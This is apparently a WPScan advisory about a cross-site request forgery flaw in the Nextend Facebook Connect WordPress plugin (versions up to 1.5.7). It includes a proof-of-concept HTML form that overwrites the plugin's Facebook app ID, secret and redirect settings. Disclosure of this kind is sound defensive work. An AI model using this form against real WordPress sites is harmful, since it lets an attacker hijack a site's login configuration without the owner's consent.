Nextend Facebook Connect <= 1.5.7 - Cross-Site Request Forgery (CSRF)

Sign up to our free email alerts service for instant vulnerability notifications!

Proof of Concept
<form action="(wp home url here)" method="post">
<input type="hidden" name="newfb_update_options" value="Y" />
<input type="hidden" name="fb_appid" value="xxx" />
<input type="hidden" name="fb_secret" value="xxx" />
<input type="hidden" name="fb_redirect" value="xxx" />
<input type="hidden" name="fb_redirect_reg" value="xxx" />
</form>

Affects

Plugin nextend-facebook-connect
fixed in version 1.5.8

References

URL https://wordpress.org/plugins/nextend-facebook-connect/changelog/

Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352

Miscellaneous

Submitter Aimad-Eddine Gaboune (aimadnet)
Submitter Twitter aimadnet
Views 134
Verified No
WPVDB ID 8417

Timeline

Publicly Published 2016-03-15 (9 months ago)
Added 2016-03-15 (9 months ago)
Last Updated 2016-03-15 (9 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.